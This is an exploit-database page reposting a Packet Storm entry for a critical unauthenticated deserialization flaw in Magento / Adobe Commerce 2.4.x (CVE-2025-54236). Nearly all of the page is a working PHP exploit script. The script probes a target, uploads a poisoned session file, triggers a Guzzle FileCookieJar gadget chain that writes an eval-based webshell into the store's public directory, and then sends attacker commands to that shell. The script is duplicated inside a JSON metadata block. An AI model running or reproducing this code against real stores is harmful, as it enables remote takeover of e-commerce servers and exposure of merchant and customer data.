📄 Adobe Commerce Insecure Deserialization_PACKETSTORM:213296

9.1 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Description

This flaw in Magento 2 / Adobe Commerce 2.4.x enables remote attackers to manipulate internal session handling paths and abuse PHP object chains Guzzle FileCookieJar gadget to achieve arbitrary file write, leading to remote code execution...

Visit Original Source

Basic Information

ID PACKETSTORM:213296

Published Dec 24, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Magento 2 / Adobe Commerce Multiple 2.4.x builds Session Reaper Deserialization Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://community.magento.com/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212729/ & CVE‑2025‑54236

[+] Summary : CVE‑2025‑54236 is a critical unauthenticated deserialization vulnerability affecting Adobe Commerce (Magento).
The flaw enables remote attackers to manipulate internal session handling paths and abuse PHP object chains (Guzzle FileCookieJar gadget)
to achieve arbitrary file write, leading to Remote Code Execution (RCE).

A public exploit known informally as “Magento Session Reaper” chains multiple weaknesses together:

Session file poisoning

JSON API injection

Object deserialization gadgets

Guzzle FileCookieJar file‑write primitive

Forced session deserialization

WebShell deployment

The attack requires no valid session, no authentication, and no user interaction.

[+] POC :

# Verification only

php poc.php https://target.com

# Execution with command

php poc.php https://target.com "whoami"

# Execution with shell code

php poc.php https://target.com "<?php system('id'); ?>"

<?php

class MagentoSessionReaperExploit {
private $targetUrl;
private $sessionId;
private $sessionFilename;
private $exploitFilename;
private $postParam;

public function __construct($targetUrl) {
$this->targetUrl = rtrim($targetUrl, '/');
$this->sessionId = bin2hex(random_bytes(16));
$this->sessionFilename = "sess_{$this->sessionId}";
$this->exploitFilename = bin2hex(random_bytes(4)) . ".php";
$this->postParam = bin2hex(random_bytes(4));
}

/**
* التحقق من وجود الثغرة
*/
public function check() {
$randomPath = implode('/', [
bin2hex(random_bytes(4)),
bin2hex(random_bytes(4)),
bin2hex(random_bytes(4))
]);

$cartId = bin2hex(random_bytes(4));
$url = "{$this->targetUrl}/rest/default/V1/guest-carts/{$cartId}/order";

$payload = $this->buildDeserializationPayload($randomPath);

$response = $this->sendRequest($url, 'PUT', $payload, [
'Content-Type: application/json',
'Accept: application/json'
]);

if (!$response) {
return "Unknown: No response from target";
}

$statusCode = $response['status_code'];
$body = strtolower($response['body']);

switch ($statusCode) {
case 400:
return "Safe: Target is patched (returns 400 Bad Request)";
case 404:
if (strpos($body, 'no such entity') !== false &&
(strpos($body, 'cartid') !== false ||
(strpos($body, 'fieldname') !== false && strpos($body, 'fieldvalue') !== false))) {
return "Appears: Target returned 404 with expected error pattern";
}
break;
case 500:
if (strpos($body, 'sessionhandler::read') !== false ||
(strpos($body, 'no such file or directory') !== false && strpos($body, 'session') !== false) ||
strpos($body, 'webapi-') !== false) {
return "Appears: Target returned 500 error with SessionHandler";
}
break;
}

return "Unknown: Unexpected HTTP status: {$statusCode}";
}

/**
* تنفيذ الاستغلال
*/
public function exploit($command = null) {
echo "[*] Generating Guzzle/FW1 deserialization payload...\n";

$phpStub = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>";
$guzzlePayload = $this->buildGuzzleFw1Payload("pub/{$this->exploitFilename}", $phpStub);

echo "[*] Uploading session file with Guzzle payload...\n";
$formKey = bin2hex(random_bytes(6));
$uploadedPath = $this->uploadSessionFile($guzzlePayload, $formKey);

if (!$uploadedPath) {
echo "[-] Failed to upload session file\n";
return false;
}

$savePath = "media/customer_address" . dirname($uploadedPath);

echo "[*] Triggering deserialization...\n";
if (!$this->triggerDeserialization($savePath)) {
echo "[-] Failed to trigger deserialization\n";
return false;
}

echo "[+] Deserialization triggered successfully\n";

// تنظيف الملفات المؤقتة
$this->cleanup();

$executeUrl = "{$this->targetUrl}/pub/{$this->exploitFilename}";
echo "[*] Executing payload at: {$executeUrl}\n";

if ($command) {
$encodedCommand = base64_encode($command);
$this->sendRequest($executeUrl, 'POST', "{$this->postParam}=" . urlencode($encodedCommand), [
'Content-Type: application/x-www-form-urlencoded'
]);
}

return true;
}

/**
* رفع ملف الجلسة الخبيثة
*/
private function uploadSessionFile($content, $formKey) {
$boundary = '----' . bin2hex(random_bytes(16));
$filename = "sess_{$this->sessionId}";

$postData = "--{$boundary}\r\n";
$postData .= "Content-Disposition: form-data; name=\"form_key\"\r\n\r\n";
$postData .= "{$formKey}\r\n";

$postData .= "--{$boundary}\r\n";
$postData .= "Content-Disposition: form-data; name=\"custom_attributes[country_id]\"; filename=\"{$filename}\"\r\n";
$postData .= "Content-Type: application/octet-stream\r\n\r\n";
$postData .= "{$content}\r\n";
$postData .= "--{$boundary}--\r\n";

$url = "{$this->targetUrl}/customer/address_file/upload";

$response = $this->sendRequest($url, 'POST', $postData, [
"Content-Type: multipart/form-data; boundary={$boundary}",
"Cookie: form_key={$formKey}"
]);

if (!$response || $response['status_code'] != 200) {
return null;
}

$jsonResponse = json_decode($response['body'], true);

if (isset($jsonResponse['error']) && $jsonResponse['error'] != 0) {
echo "[-] Upload failed: {$jsonResponse['error']}\n";
return null;
}

if (isset($jsonResponse['file'])) {
return $jsonResponse['file'];
}

$sessionSaveDir = $this->sessionSaveDirFromFilename($filename);
return "/{$sessionSaveDir}/{$filename}";
}

/**
* بناء payload إلغاء التسلسل
*/
private function buildDeserializationPayload($savePath) {
$payload = [
'paymentMethod' => [
'paymentData' => [
'context' => [
'urlBuilder' => [
'session' => [
'sessionConfig' => [
'savePath' => $savePath
]
]
]
]
]
]
];

return json_encode($payload);
}

/**
* تفعيل إلغاء التسلسل
*/
private function triggerDeserialization($savePath) {
$cartId = bin2hex(random_bytes(4));
$url = "{$this->targetUrl}/rest/default/V1/guest-carts/{$cartId}/order";

$payload = $this->buildDeserializationPayload($savePath);

$response = $this->sendRequest($url, 'PUT', $payload, [
'Content-Type: application/json',
'Accept: application/json',
"Cookie: PHPSESSID={$this->sessionId}"
]);

if (!$response) {
return false;
}

return in_array($response['status_code'], [404, 500]);
}

/**
* بناء payload Guzzle/FW1
*/
private function buildGuzzleFw1Payload($targetFile, $phpContent) {
$escaped = "{$phpContent}\n";

// Serialize string with PHP binary-safe format
$setCookieData = "a:3:{" .
$this->serializeStringAscii('Expires') . "i:1;" .
$this->serializeStringAscii('Discard') . "b:0;" .
$this->serializeStringAscii('Value') . $this->serializeStringAscii($escaped) .
"}";

$setCookie = 'O:27:"GuzzleHttp\\Cookie\\SetCookie":1:' .
"{" . $this->serializeStringAscii('data') . "{$setCookieData}}";

$cookiesArray = "a:1:{i:0;{$setCookie}}";

$fileCookieJar = 'O:31:"GuzzleHttp\\Cookie\\FileCookieJar":4:' .
"{" . $this->serializeStringAscii('cookies') . "{$cookiesArray}" .
$this->serializeStringAscii('strictMode') . "N;" .
$this->serializeStringAscii('filename') . $this->serializeStringAscii($targetFile) .
$this->serializeStringAscii('storeSessionCookies') . "b:1;}";

return "_|{$fileCookieJar}";
}

/**
* تسلسل نص بصيغة ASCII ثنائية آمنة لـ PHP
*/
private function serializeStringAscii($str) {
$result = '';
$length = strlen($str);

for ($i = 0; $i < $length; $i++) {
$byte = ord($str[$i]);

// Keep printable ASCII characters except backslash (92) and double quote (34)
if ($byte >= 32 && $byte <= 126 && $byte != 92 && $byte != 34) {
$result .= chr($byte);
} else {
// Escape other characters as \xHH
$result .= sprintf("\\x%02x", $byte);
}
}

return "S:{$length}:\"{$result}\";";
}

/**
* الحصول على مسار حفظ الجلسة من اسم الملف
*/
private function sessionSaveDirFromFilename($filename) {
return $filename[0] . '/' . $filename[1];
}

/**
* إرسال طلب HTTP
*/
private function sendRequest($url, $method, $data = null, $headers = []) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

if ($method === 'POST' || $method === 'PUT') {
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
}

if (!empty($headers)) {
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
}

$response = curl_exec($ch);
$statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);

curl_close($ch);

if ($error) {
echo "[-] cURL Error: {$error}\n";
return null;
}

return [
'status_code' => $statusCode,
'body' => $response
];
}

/**
* تنظيف الملفات المؤقتة
*/
private function cleanup() {
// يمكن إضافة منطق التنظيف هنا
// في الإصدار الحقيقي، يجب حذف الملفات التي تم إنشاؤها
}
}

// مثال للاستخدام
if (php_sapi_name() === 'cli') {
echo "Magento SessionReaper Exploit by indoushka\n";
echo "=============================================\n\n";

if ($argc < 2) {
echo "Usage: php " . basename(__FILE__) . " <target_url> [command]\n";
echo "Example: php " . basename(__FILE__) . " https://target.com \"whoami\"\n";
exit(1);
}

$targetUrl = $argv[1];
$command = $argc > 2 ? $argv[2] : null;

$exploit = new MagentoSessionReaperExploit($targetUrl);

// التحقق أولاً
echo "[*] Checking target...\n";
$checkResult = $exploit->check();
echo "[*] Check result: {$checkResult}\n";

if (strpos($checkResult, 'Appears') !== false || strpos($checkResult, 'Unknown') !== false) {
echo "[*] Attempting exploitation...\n";
if ($exploit->exploit($command)) {
echo "[+] Exploitation completed successfully\n";
} else {
echo "[-] Exploitation failed\n";
}
} else {
echo "[-] Target appears to be safe or patched\n";
}
}

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-24T16:34:07",
    "description": "This flaw in Magento 2 / Adobe Commerce 2.4.x enables remote attackers to manipulate internal session handling paths and abuse PHP object chains Guzzle FileCookieJar gadget to achieve arbitrary file write, leading to remote code execution...",
    "published": "2025-12-24T00:00:00",
    "modified": "2025-12-24T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Adobe Commerce Insecure Deserialization",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:213296",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-54236"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Magento 2 / Adobe Commerce Multiple 2.4.x builds Session Reaper Deserialization Vulnerability                               |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://community.magento.com/                                                                                              |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/212729/ & CVE\u20112025\u201154236\n    \n    [+] Summary    : CVE\u20112025\u201154236 is a critical unauthenticated deserialization vulnerability affecting Adobe Commerce (Magento).\n                     The flaw enables remote attackers to manipulate internal session handling paths and abuse PHP object chains (Guzzle FileCookieJar gadget) \n    \t\t\t\t to achieve arbitrary file write, leading to Remote Code Execution (RCE).\n    \n    A public exploit known informally as \u201cMagento Session Reaper\u201d chains multiple weaknesses together:\n    \n    Session file poisoning\n    \n    JSON API injection\n    \n    Object deserialization gadgets\n    \n    Guzzle FileCookieJar file\u2011write primitive\n    \n    Forced session deserialization\n    \n    WebShell deployment\n    \n    The attack requires no valid session, no authentication, and no user interaction.\n    \n    [+]  POC :\n    \n    # Verification only\n    \n    php poc.php https://target.com\n    \n    # Execution with command\n    \n    php poc.php https://target.com \"whoami\"\n    \n    # Execution with shell code\n    \n    php poc.php https://target.com \"<?php system('id'); ?>\"\n    \n    \n    <?php\n    \n    class MagentoSessionReaperExploit {\n        private $targetUrl;\n        private $sessionId;\n        private $sessionFilename;\n        private $exploitFilename;\n        private $postParam;\n        \n        public function __construct($targetUrl) {\n            $this->targetUrl = rtrim($targetUrl, '/');\n            $this->sessionId = bin2hex(random_bytes(16));\n            $this->sessionFilename = \"sess_{$this->sessionId}\";\n            $this->exploitFilename = bin2hex(random_bytes(4)) . \".php\";\n            $this->postParam = bin2hex(random_bytes(4));\n        }\n        \n        /**\n         * \u0627\u0644\u062a\u062d\u0642\u0642 \u0645\u0646 \u0648\u062c\u0648\u062f \u0627\u0644\u062b\u063a\u0631\u0629\n         */\n        public function check() {\n            $randomPath = implode('/', [\n                bin2hex(random_bytes(4)),\n                bin2hex(random_bytes(4)),\n                bin2hex(random_bytes(4))\n            ]);\n            \n            $cartId = bin2hex(random_bytes(4));\n            $url = \"{$this->targetUrl}/rest/default/V1/guest-carts/{$cartId}/order\";\n            \n            $payload = $this->buildDeserializationPayload($randomPath);\n            \n            $response = $this->sendRequest($url, 'PUT', $payload, [\n                'Content-Type: application/json',\n                'Accept: application/json'\n            ]);\n            \n            if (!$response) {\n                return \"Unknown: No response from target\";\n            }\n            \n            $statusCode = $response['status_code'];\n            $body = strtolower($response['body']);\n            \n            switch ($statusCode) {\n                case 400:\n                    return \"Safe: Target is patched (returns 400 Bad Request)\";\n                case 404:\n                    if (strpos($body, 'no such entity') !== false &&\n                        (strpos($body, 'cartid') !== false || \n                        (strpos($body, 'fieldname') !== false && strpos($body, 'fieldvalue') !== false))) {\n                        return \"Appears: Target returned 404 with expected error pattern\";\n                    }\n                    break;\n                case 500:\n                    if (strpos($body, 'sessionhandler::read') !== false ||\n                        (strpos($body, 'no such file or directory') !== false && strpos($body, 'session') !== false) ||\n                        strpos($body, 'webapi-') !== false) {\n                        return \"Appears: Target returned 500 error with SessionHandler\";\n                    }\n                    break;\n            }\n            \n            return \"Unknown: Unexpected HTTP status: {$statusCode}\";\n        }\n        \n        /**\n         * \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n         */\n        public function exploit($command = null) {\n            echo \"[*] Generating Guzzle/FW1 deserialization payload...\\n\";\n            \n            $phpStub = \"<?php @eval(base64_decode(\\$_POST['{$this->postParam}']));?>\";\n            $guzzlePayload = $this->buildGuzzleFw1Payload(\"pub/{$this->exploitFilename}\", $phpStub);\n            \n            echo \"[*] Uploading session file with Guzzle payload...\\n\";\n            $formKey = bin2hex(random_bytes(6));\n            $uploadedPath = $this->uploadSessionFile($guzzlePayload, $formKey);\n            \n            if (!$uploadedPath) {\n                echo \"[-] Failed to upload session file\\n\";\n                return false;\n            }\n            \n            $savePath = \"media/customer_address\" . dirname($uploadedPath);\n            \n            echo \"[*] Triggering deserialization...\\n\";\n            if (!$this->triggerDeserialization($savePath)) {\n                echo \"[-] Failed to trigger deserialization\\n\";\n                return false;\n            }\n            \n            echo \"[+] Deserialization triggered successfully\\n\";\n            \n            // \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0645\u0624\u0642\u062a\u0629\n            $this->cleanup();\n            \n            $executeUrl = \"{$this->targetUrl}/pub/{$this->exploitFilename}\";\n            echo \"[*] Executing payload at: {$executeUrl}\\n\";\n            \n            if ($command) {\n                $encodedCommand = base64_encode($command);\n                $this->sendRequest($executeUrl, 'POST', \"{$this->postParam}=\" . urlencode($encodedCommand), [\n                    'Content-Type: application/x-www-form-urlencoded'\n                ]);\n            }\n            \n            return true;\n        }\n        \n        /**\n         * \u0631\u0641\u0639 \u0645\u0644\u0641 \u0627\u0644\u062c\u0644\u0633\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629\n         */\n        private function uploadSessionFile($content, $formKey) {\n            $boundary = '----' . bin2hex(random_bytes(16));\n            $filename = \"sess_{$this->sessionId}\";\n            \n            $postData = \"--{$boundary}\\r\\n\";\n            $postData .= \"Content-Disposition: form-data; name=\\\"form_key\\\"\\r\\n\\r\\n\";\n            $postData .= \"{$formKey}\\r\\n\";\n            \n            $postData .= \"--{$boundary}\\r\\n\";\n            $postData .= \"Content-Disposition: form-data; name=\\\"custom_attributes[country_id]\\\"; filename=\\\"{$filename}\\\"\\r\\n\";\n            $postData .= \"Content-Type: application/octet-stream\\r\\n\\r\\n\";\n            $postData .= \"{$content}\\r\\n\";\n            $postData .= \"--{$boundary}--\\r\\n\";\n            \n            $url = \"{$this->targetUrl}/customer/address_file/upload\";\n            \n            $response = $this->sendRequest($url, 'POST', $postData, [\n                \"Content-Type: multipart/form-data; boundary={$boundary}\",\n                \"Cookie: form_key={$formKey}\"\n            ]);\n            \n            if (!$response || $response['status_code'] != 200) {\n                return null;\n            }\n            \n            $jsonResponse = json_decode($response['body'], true);\n            \n            if (isset($jsonResponse['error']) && $jsonResponse['error'] != 0) {\n                echo \"[-] Upload failed: {$jsonResponse['error']}\\n\";\n                return null;\n            }\n            \n            if (isset($jsonResponse['file'])) {\n                return $jsonResponse['file'];\n            }\n            \n            $sessionSaveDir = $this->sessionSaveDirFromFilename($filename);\n            return \"/{$sessionSaveDir}/{$filename}\";\n        }\n        \n        /**\n         * \u0628\u0646\u0627\u0621 payload \u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u062a\u0633\u0644\u0633\u0644\n         */\n        private function buildDeserializationPayload($savePath) {\n            $payload = [\n                'paymentMethod' => [\n                    'paymentData' => [\n                        'context' => [\n                            'urlBuilder' => [\n                                'session' => [\n                                    'sessionConfig' => [\n                                        'savePath' => $savePath\n                                    ]\n                                ]\n                            ]\n                        ]\n                    ]\n                ]\n            ];\n            \n            return json_encode($payload);\n        }\n        \n        /**\n         * \u062a\u0641\u0639\u064a\u0644 \u0625\u0644\u063a\u0627\u0621 \u0627\u0644\u062a\u0633\u0644\u0633\u0644\n         */\n        private function triggerDeserialization($savePath) {\n            $cartId = bin2hex(random_bytes(4));\n            $url = \"{$this->targetUrl}/rest/default/V1/guest-carts/{$cartId}/order\";\n            \n            $payload = $this->buildDeserializationPayload($savePath);\n            \n            $response = $this->sendRequest($url, 'PUT', $payload, [\n                'Content-Type: application/json',\n                'Accept: application/json',\n                \"Cookie: PHPSESSID={$this->sessionId}\"\n            ]);\n            \n            if (!$response) {\n                return false;\n            }\n            \n            return in_array($response['status_code'], [404, 500]);\n        }\n        \n        /**\n         * \u0628\u0646\u0627\u0621 payload Guzzle/FW1\n         */\n        private function buildGuzzleFw1Payload($targetFile, $phpContent) {\n            $escaped = \"{$phpContent}\\n\";\n            \n            // Serialize string with PHP binary-safe format\n            $setCookieData = \"a:3:{\" . \n                $this->serializeStringAscii('Expires') . \"i:1;\" .\n                $this->serializeStringAscii('Discard') . \"b:0;\" .\n                $this->serializeStringAscii('Value') . $this->serializeStringAscii($escaped) . \n            \"}\";\n            \n            $setCookie = 'O:27:\"GuzzleHttp\\\\Cookie\\\\SetCookie\":1:' .\n                \"{\" . $this->serializeStringAscii('data') . \"{$setCookieData}}\";\n            \n            $cookiesArray = \"a:1:{i:0;{$setCookie}}\";\n            \n            $fileCookieJar = 'O:31:\"GuzzleHttp\\\\Cookie\\\\FileCookieJar\":4:' .\n                \"{\" . $this->serializeStringAscii('cookies') . \"{$cookiesArray}\" .\n                $this->serializeStringAscii('strictMode') . \"N;\" .\n                $this->serializeStringAscii('filename') . $this->serializeStringAscii($targetFile) .\n                $this->serializeStringAscii('storeSessionCookies') . \"b:1;}\";\n            \n            return \"_|{$fileCookieJar}\";\n        }\n        \n        /**\n         * \u062a\u0633\u0644\u0633\u0644 \u0646\u0635 \u0628\u0635\u064a\u063a\u0629 ASCII \u062b\u0646\u0627\u0626\u064a\u0629 \u0622\u0645\u0646\u0629 \u0644\u0640 PHP\n         */\n        private function serializeStringAscii($str) {\n            $result = '';\n            $length = strlen($str);\n            \n            for ($i = 0; $i < $length; $i++) {\n                $byte = ord($str[$i]);\n                \n                // Keep printable ASCII characters except backslash (92) and double quote (34)\n                if ($byte >= 32 && $byte <= 126 && $byte != 92 && $byte != 34) {\n                    $result .= chr($byte);\n                } else {\n                    // Escape other characters as \\xHH\n                    $result .= sprintf(\"\\\\x%02x\", $byte);\n                }\n            }\n            \n            return \"S:{$length}:\\\"{$result}\\\";\";\n        }\n        \n        /**\n         * \u0627\u0644\u062d\u0635\u0648\u0644 \u0639\u0644\u0649 \u0645\u0633\u0627\u0631 \u062d\u0641\u0638 \u0627\u0644\u062c\u0644\u0633\u0629 \u0645\u0646 \u0627\u0633\u0645 \u0627\u0644\u0645\u0644\u0641\n         */\n        private function sessionSaveDirFromFilename($filename) {\n            return $filename[0] . '/' . $filename[1];\n        }\n        \n        /**\n         * \u0625\u0631\u0633\u0627\u0644 \u0637\u0644\u0628 HTTP\n         */\n        private function sendRequest($url, $method, $data = null, $headers = []) {\n            $ch = curl_init();\n            \n            curl_setopt($ch, CURLOPT_URL, $url);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\n            curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);\n            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\n            curl_setopt($ch, CURLOPT_TIMEOUT, 30);\n            \n            if ($method === 'POST' || $method === 'PUT') {\n                curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);\n                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\n            }\n            \n            if (!empty($headers)) {\n                curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n            }\n            \n            $response = curl_exec($ch);\n            $statusCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\n            $error = curl_error($ch);\n            \n            curl_close($ch);\n            \n            if ($error) {\n                echo \"[-] cURL Error: {$error}\\n\";\n                return null;\n            }\n            \n            return [\n                'status_code' => $statusCode,\n                'body' => $response\n            ];\n        }\n        \n        /**\n         * \u062a\u0646\u0638\u064a\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u0645\u0624\u0642\u062a\u0629\n         */\n        private function cleanup() {\n            // \u064a\u0645\u0643\u0646 \u0625\u0636\u0627\u0641\u0629 \u0645\u0646\u0637\u0642 \u0627\u0644\u062a\u0646\u0638\u064a\u0641 \u0647\u0646\u0627\n            // \u0641\u064a \u0627\u0644\u0625\u0635\u062f\u0627\u0631 \u0627\u0644\u062d\u0642\u064a\u0642\u064a\u060c \u064a\u062c\u0628 \u062d\u0630\u0641 \u0627\u0644\u0645\u0644\u0641\u0627\u062a \u0627\u0644\u062a\u064a \u062a\u0645 \u0625\u0646\u0634\u0627\u0624\u0647\u0627\n        }\n    }\n    \n    // \u0645\u062b\u0627\u0644 \u0644\u0644\u0627\u0633\u062a\u062e\u062f\u0627\u0645\n    if (php_sapi_name() === 'cli') {\n        echo \"Magento SessionReaper Exploit by indoushka\\n\";\n        echo \"=============================================\\n\\n\";\n        \n        if ($argc < 2) {\n            echo \"Usage: php \" . basename(__FILE__) . \" <target_url> [command]\\n\";\n            echo \"Example: php \" . basename(__FILE__) . \" https://target.com \\\"whoami\\\"\\n\";\n            exit(1);\n        }\n        \n        $targetUrl = $argv[1];\n        $command = $argc > 2 ? $argv[2] : null;\n        \n        $exploit = new MagentoSessionReaperExploit($targetUrl);\n        \n        // \u0627\u0644\u062a\u062d\u0642\u0642 \u0623\u0648\u0644\u0627\u064b\n        echo \"[*] Checking target...\\n\";\n        $checkResult = $exploit->check();\n        echo \"[*] Check result: {$checkResult}\\n\";\n        \n        if (strpos($checkResult, 'Appears') !== false || strpos($checkResult, 'Unknown') !== false) {\n            echo \"[*] Attempting exploitation...\\n\";\n            if ($exploit->exploit($command)) {\n                echo \"[+] Exploitation completed successfully\\n\";\n            } else {\n                echo \"[-] Exploitation failed\\n\";\n            }\n        } else {\n            echo \"[-] Target appears to be safe or patched\\n\";\n        }\n    }\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/213296",
    "cvss": {
        "score": 9.1,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/213296/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply